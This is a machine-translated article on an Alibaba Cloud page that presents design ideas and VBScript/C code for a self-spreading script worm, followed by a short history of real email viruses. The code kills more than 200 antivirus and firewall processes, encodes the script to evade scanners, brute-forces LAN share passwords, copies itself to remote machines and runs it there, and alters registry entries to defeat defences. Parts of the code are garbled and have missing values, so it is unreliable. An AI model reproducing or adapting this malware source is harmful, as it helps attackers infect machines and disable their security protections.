Research on the concept of Hyper-script virus-vulnerability

Source: Internet
Author: User
Tags chr rand microsoft outlook
The idea of a Hyper script virus
Farewell to the past love of the limelight, love the era of bragging, learn some real skills is the hard truth. Study hard and make progress every day. Here's the idea for a hyper-scripting virus.
Scripting viruses are very easy to make, for a person who is ignorant of programming, as long as the Windows system and the registry have enough knowledge, on the network to download a few virus code to take a closer look, you can write a virus in a short time variant, the script virus is so characteristic of a few, Without much programming skills, the real virus maker is not using VBScript to write viruses, and now because of the popularity of scripting languages and Micrsoft's WSH (Windows script Hosting), these scripting languages can make waves on a single computer. WSH is a service that enables visual Basic script and JScript scripts to run like batch files in a Windows environment, such as the command line.
It allows the script to create a Com/ole object in Windows and use the methods, properties, and events in those objects. Scripting viruses are very easy to make, for a person who knows nothing about programming, as long as you know enough about Windows and the registry, you can write a virus variant in a short period of time by downloading a few virus codes to the network. So scripting viruses are easy to write, and easy to be clear and defensive, Online for how to prevent its article is a dime, people also develop, the virus will evolve. Let's say: The old cat is training, and if the mouse doesn't train, it's not dead.
1, now a lot of anti-virus software can be the unknown script virus to make judgments, so the virus to survive on the need to make better protection:
(1). Virus to use a large number of VMI, so that it can kill antivirus software or firewall process, here I give a piece of code:
Todo
StrComputer = "."
Set objWMIService = GetObject ("" winmgmts: "&" "{impersonationlevel=impersonate}!\\" "& StrComputer &" "\ root\cimv2 "")
Fv = array ("Notepad.exe" ", " "Pccguide.exe" ", " "Pccclient.exe" "," "Rfw.exe" ", " " DAVPFW.exe ", " "Vpc32.exe" ", " "Ravmon.exe" ", " "Debu.exe" ", " "Scan.exe" ", " "Mon.exe" ",   "Vir.exe" ", " "Iom.exe",  "Ice.exe" ", " "Anti.exe" ", " "Fir.exe" ", " "Prot.exe" ",   "Secu.exe" ", " "Dbg.exe" ", " "Pcc.exe" ", " "Avk.exe" ", " "Spy.exe" ", " " Pcciomon.exe ", " "Pccmain.exe" ", " "Pop3trap.exe" ", " "Webtrap.exe" ", " "Vshwin32.exe" ",   "Vsstat.exe" ", " "Navapw32.exe" ", " "Lucomserver.exe" ", " "Lamapp.exe" ", " "Atrack.exe" ", " "Nisserv.exe" ", " "Vavrunr.exe" ", " "Navwnt.exe" ", " "Pview95.exe" ", " "Luall.exe" ",   "Avxonsol.exe" ", " "Avsynmgr.exe" ", " "Symproxysvc.exe" ", " "Regedit.exe" ", " " Smtpsvc.exe ", " "Moniker.exe" ", " "Program.exe" ", " "Explorewclass.exe" ", " "Rn.exe" ", " "Ms.exe" ", " "Microsoft.exe" ", ""Office.exe" ", " "Smtpsvc.exe" ", " "Avconsol.exe" ", " "Avsunmgr.exe" ", " "Vsstat.exe" ", " "Navapw32.exe" ", " "Navw32.exe" ", " "Nmain.exe" ", " "Luall.exe" ", " "Lucomserver.exe" ", " "Iamapp.exe" ", " "Atrack.exe" ", " "Nisserv.exe" ", " "Rescur32.exe" ", " "Nisum.exe" ", " "  navlu32.exe ", " "Navrunr.exe" ", " "Pview95.exe" ", " "F-stopw.exe" ", " "F-prot95.exe" ",   "Pccwin98.exe" ", " "Fp-win.exe" ", " "Nvc95.exe" ", " "Norton.exe" ", " "Mcafee.exe" ",   "Antivir.exe" ", " "Webscanx.exe" ", " "Safeweb.exe" ", " "Cfinet.exe" ", " "Cfinet32.exe" " ,  "Avp.exe" ", " "Lockdown2000.exe" ", " "Lockdown2002.exe" ", " "Zonealarm.exe" ", " " Wink.exe ", " "Sirc32.exe" ", " "Scam32.exe" ", " "Regedit.exe" ", " "Tmoagent.exe" ", " " Tmntsrv.exe ", " "Tmproxy.exe" ", " "Tmupdito.exe" ", " "Tsc.exe" ", " "Krf.exe" ", " " Kpfw32.exe "",  "" _avpm.exe "",  "Autodown.exe" ", " "Avkser.exe" ", " "Avpupd.exe" ", " "Blackd.exe" ", " "Cfind.exe" ",   "Cleaner.exe" ", " "Ecengine.exe" ", " "Fp-win.exe" ", " "Iamserv.exe" ", " "Lcloadnt.exe" " ,  "Lookout.exe" ", " "N32acan.exe" ", " "Navw32.exe" ", " "Normist.exe" ", " "Padmin.exe" ",   "Pccwin98.exe" ", " "Rav7win.exe" ", " "Smc.exe" ", " "Tca.exe" ", " "Vettray.exe" ", " "Ackwin32.exe" ", " "Avpnt.exe" ", " "Avpdos32.exep" ", " "Avsched32.exe" ", " "Blackice.exe" ",   "Efinet32.exe" ", " "Esafe.exe" ", " "Ibmasn.exe" ", " "Icmoon.exe" ", " "Navapw32.exe" ",   "Nupgrade.exe" ", " "Pavcl.exe" ", " "Pcfwallicon.exe" ", " "Scanpm.exe" ", " "Sphinx.exe" " ,  "Sphinx.exe" ", " "Tds2-98.exe" ", " "Vsscan40.exe" ", " "Webscanx.exe" ", " "Webscan.exe" ", " "Anti-trojan.exe" ", " "Ave32.exe" ", " "Avp.exe" ", " "Avpm.exe" ", " "Cfiadmin.exe" ",   "" Dvp95.exe "",   "" Espwatch.exe ", " "Ibmavsp.exe" ", " "Icsupp95.exe" "," "Jed.exe" ", " "Moolive.exe" ", " " Nisum.exep ", " "Nvc95.exe" ", " "Navsched.exe" ", " "Persfw.exe" ", " "Safeweb.exe" ", " " Scrscan.exe ", " "Sweep95.exe" ", " "Tds2-nt.exe" ", " "_avpcc.exe" ", " "Apvxdwin.exe" ", " " Avwupd32.exe ", " "Cfiaudit.exe" ", " "Claw95ct.exe" ", " "Dv95_o.exe" ", " "F-agnt94.exe" ",   " findviru.exe" ", " "Iamapp.exe" ", " "Icload95.exe" ", " "Icssuppnt.exe" ", " " Mpftray.exe ", " "Nmain.exe" ", " "Rav7.exe" ", " "Scan32.exe" ", " "Serv95.exe" ", " " Vshwin32.exe ", " "Zonealarm.exe" ", " "Avpmon.exe" ", " "Avp32.exe" ", " "Kavsvc.exe" ", " " Mcagent.exe ", " "Nvsvc32.exe" ", " "Mcmnhdlr.exe" ", " "Regsvc.exe" ", " "Mailmon.exe" ", " " Fp-win.exe "",  "" Mghtml.exe "") "
For each FA in FV
Set colprocesslist = objWMIService.ExecQuery ("" Select * from Win32_Process Where Name = "&fa&" "")
For each objprocess in colProcessList
Objprocess.terminate ()
Next
Next
Loop
Array () arrays store more than 200 anti-virus software and firewall main process, of course, you can define the array at the beginning of the program, in the following infection function section, you can use it to delete the main program body of the software. Pigs can think of problems, do not need me to say again. Because my net name is also called "pig", these must rob in the anti-virus software before running up to achieve the goal.
(2). The virus should use the deformation function as much as possible, use the new encryption algorithm, of course, the script encryption algorithm is very simple, at this point new happy time to do very well.
Execute DeCode ("Kqe ' mv FCJJM")
Function DeCode (coded)
For I=1 to Len (coded)
Curchar=mid (coded,i,1)
If ASC (Curchar) = then CURCHAR=CHR (10)
Else if ASC (curchar) = then CURCHAR=CHR (13)
Else if ASC (curchar) = then CURCHAR=CHR (32)
Else if ASC (curchar) = then CURCHAR=CHR (9)
Else CURCHAR=CHR (ASC (Curchar)-2)
End If
Decode=decode & Curchar
Next
End Function
The following gives a C example (technology does not pass, please boss advice Hackercc@qq.com)
#include <string.h>
#include <stdio.h>
Main ()
{
FILE *in,*out,*read;
Char *exc= "Execute DeCode";
Char *excu= "\") \ n ";
Char *func= "Function DeCode (coded) \nfor I=1 to Len (coded) \ncurchar=mid (coded,i,1) \ n";
Char *funct= "if ASC (Curchar) = then CURCHAR=CHR (a) \nelse if ASC (Curchar) = then CURCHAR=CHR () \ n";
Char *functi= "Else if ASC (Curchar) = then CURCHAR=CHR () \nelse if ASC (Curchar) = then CURCHAR=CHR (9) \nelse curchar= Chr (ASC (Curchar)-2) \nend If\ndecode=decode & Curchar\nnext\nend function\n ";
Char buf[100][101];
Char name[30];
Char ch;
Char *p;
int i=0,j=0;
Gets (name);
if ((In=fopen (name, "r+")) ==null)
{
printf ("Cant open the file%", name);
Exit (0);
}
Ch=getc (in);
while (!feof (in))
{
if (ch==15) ch=10;
else if (ch==16) ch=13;
else if (ch==17) ch=32;
else if (ch==18) ch=9;
else ch=ch-2;
Fseek (in,-1l,1);
FPUTC (Ch,in);
Fseek (in,0l,1);
Ch=getc (in);
}
Fclose (in);
Read=fopen (name, "r+");
Todo
{
if (i>=100)
{
Fclose (in);
}
P=fgets (Buf[i],80,in);
i++;
}while (P!=null);
Fclose (read);
Out=fopen (name, "w+");
Fputs (exc,out);
for (; j<i-1;j++)
{
Fputs (buf[j],out);
}
Fputs (excu,out);
Fputs (func,out);
Fputs (funct,out);
Fputs (functi,out);
Fclose (out);
}

2, the virus's aggressiveness can be extended to the system vulnerable host, the worm can use some basic DOS commands and third-party hacker tools to exploit
3, the virus uses the mail and the local area network to propagate sexually:
Attack LAN can adopt simplified network code, and use VMI to run virus body directly on remote host, and can decipher share password (poor solution too time-consuming, no need):
Sub NetShare ()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, Pwd,strings, K
Count = "0"
Dot = "."
driveconnected= "0"
Set Yu=createobject ("Scrip" + "ting.") + "Filesyst" + "Emob" + "ject")
Set Net=createobject ("WSC" + "RIPT.N" + "etwork")
Set Qq=createobject ("WSc" + "ript.") S "+" hell ")
On Error Resume Next
Randomize
Randaddress ()
Todo
Do While driveconnected = "0"
Checkadress ()
ShareName ()
PWD = ""
PQD = ""
strings = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
For k = 1 to Len (strings) Step 1
Net.mapnetworkdrive "I:", "\" & "Name" & "\c", "& pwd & Mid (strings,k,1)", "& Pqd & Mid (Strings, k,1) "
If InStr (NET. Body, wrong) <> 0 Then
PWD = pwd & Mid (strings,k,1)
End If
Next
' Deciphering shared passwords
Enumdrives ()
Loop
Copy ()
Disconnectdrive ()
QQ "\\name\con\con", 0
Run ()
Loop
End Sub
function Run ()
Dim Controller, Remotescript
Set Controller = WScript.CreateObject ("WSHC" + "Ontroller")
Set remotescript = Controller.createscript ("System.vbe", "name")
Wscript.connectobject remotescript, "Remote_"
Remotescript.execute
Do While Remotescript.status <> 2
Wscript.Sleep 100
Loop
Wscript.disconnectobject Remotescript
Remote_error ()
End Function
Sub Remote_error
Dim Theerror
Set Theerror = Remotescript.error
WScript.Echo "Error" & Theerror.number & "-line:" & Theerror.line & ", Char:" & THEERROR.CHARACTE R & VbCrLf & "Description:" & theerror.description
Wscript.quit-1
End Sub
Function disconnectdrive ()
Net.removenetworkdrive "I:"
driveconnected = "0"
End Function
Function copy ()
Yu.copyfile dir2& "\system.vbe", "I:\windows\"
Yu.copyfile dir2& "\system.vbe", "I:\windows\system32\"
Yu.copyfile dir2& "\system.vbe", "I:\winnt\system32\"
Yu.copyfile dir2& "\system.inf", "I:\winnt\system32\"
Yu.copyfile dir2& "\system.inf", "I:\windows\system32\"
' Copy to each other's machine.
End Function
Function checkaddress ()
O4 = O4 +1
If O4 = "255" then randaddress ()
End Function
Function sharename ()
Name = "Octa & dot & octb & dot & octc & dot & octd"
End Function
Function enumdrives ()
Set You=net.enumnetworkdrives
For p = 0. Count-1
If name = You.item (p) Then
driveconnected = 1
Else
driveconnected = 0
End If
Next
End Function
Function Randum ()
Rand = Int ((254 * rnd) + 1)
End Function
Function randaddress ()
If Count < Then
O1=int (() * Rnd + 199)
Coun=count + 1
Else
Randum ()
O1=rand
End If
Randum ()
O2=rand
Randum ()
O3=rand
o4= "1"
End Function
4, some advanced users of Windows to protect against the script virus, the registry of the FileSystemObject item to delete, the new worm will start in execution,
Check that the system's FileSystemObject entry exists, and if it does not, it will write back to the FileSystemObject entry, but you can also change it to a different name, so that some
Anti-Virus software is not necessarily known,
On Error Resume Next
Set wa=createobject ("WSc" + "ript.") S "+" hell ")
Tt=wa. RegRead ("Hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools")
If Tt=1 Then
Wa. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools", 00000000, "REG_ DWORD "
End If
Uu=wa. RegRead ("hkey_classes_root\clsid\{0d43fe01-f093-11cf-8940-00a0c9054228}")
If uu= "" Then
Uu. RegWrite "hkey_classes_root\clsid\{0d43fe01-f093-11cf-8940-00a0c9054228}", "FileSystemObject", "REG_SZ"
End If
Or
A.regdelete "Hkey_classes_root\scripting.filesystemobject\clsid\"
A.regdelete "Hkey_classes_root\scripting.filesystemobject\"
A.regwrite "hkey_classes_root\wangzhitong\", "FileSystem Object", "REG_SZ"
A.regwrite "hkey_classes_root\wangzhitong\clsid\", "{0d43fe01-f093-11cf-8940-00a0c9054228}", "REG_SZ"
Set Yu=createobject ("Wangzhitong")
Later, the FileSystemObject items in the system are replaced with Wangzhitong.
6, how can you write a worm to allow other worms to exist in a system, so it is possible to eliminate other virus programs. Of course you have to analyze those virus programs first, just clear them off.
--------------------------------------------------------------------------------------------

Simply copied some of the computer virus history from other places for your reference
1999/3/, a computer virus called "Melissa" (Melissa) swept across Europe and the United States. The virus uses the messaging system to replicate, spread,
Causing network congestion, or even paralysis. And the virus can also cause leaks in the process of transmission.
2000/5/: "Love Worm" (loveletter) virus appears. The "Love Worm" virus is a scripting virus that spreads through Microsoft's e-mail system. The message of this virus, "I Love You", contains an attachment "Love-letter-for-you.txt.vbs", once opened in Microsoft e-mail, the system will automatically copy and send the virus to all the e-mail addresses in the user's address book. It travels several times faster than the "Melissa" virus.
2001/1/21
A variant of the "Melissa" virus attacks the Macintosh computer. This virus can infect Mac files,
A large number of emails generated by the virus can clog the server, modify the settings of Microsoft Word programs, and infect files and templates.
The email attachment with this "Melissa" virus is called "anniv." Doc ". This is the first time this type of virus has been directed at the Macintosh computer.
2001/2/15
The Dutch police 13th arrested a 20-year-old man who claimed to have invented the "Kournikova" computer virus. This person faces a 4-year prison sentence.
The "Kournikova" virus, transmitted via email, was 12th in Europe, America and Asia, with a large backlog of spam messages in the e-mail system,
The system slows down significantly, and some companies simply shut down the e-mail system. The Dutch man claims to be a 19-year-old Russian tennis actress Anna Kournikova fans
The virus's author says he is not a programming expert, but is downloading a virus from the internet and then writing a program to do it.
2001/5/6
A new malignant computer virus "happy Hour" (Happytime/vbshappytime. A Worm) has begun to spread in China.
"Happy hour" virus is likely to be a homemade virus, it is similar to the "Love Worm" worm virus. User through Microsoft Office suite (Outlook)
When you receive a message with a "happy hour" virus, no matter whether the user opens the message or not, as long as the mouse points to a poisoned message, the "Happy Hour" virus is activated,
Then immediately infect the files on the hard drive. Infected with the "Happy Hour" virus, if the computer clock date and month of the sum of 13,
The virus will gradually remove the EXE and DLL files from the hard drive and eventually cause the system to become paralyzed.
2001/5/11
The new virus "home page" is spreading globally, a virus known as "homepage" as a "distant relative" of the "Kournikova" virus. The email with this computer virus is titled "homepage," and the text of the message reads: "Hey, you should look at this page, it's really cool." "The message is packed with a homepage named". HTML. VBS "attachment. Once the user opens the attachment, the virus first replicates itself and sends a poison message to every address in the Microsoft Outlook Address Book. Then search the Outlook Inbox and delete all of the letters named "Home Page" and open several pornographic pages. Thankfully, the virus did not cause much damage, and less than 10,000 computers were paralysed by the impact. Due to jet lag, U.S. antivirus companies have been able to prevent further spread of the virus after receiving news from the eastern hemisphere. (Source: Years Federation    Author: Guinea pig)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.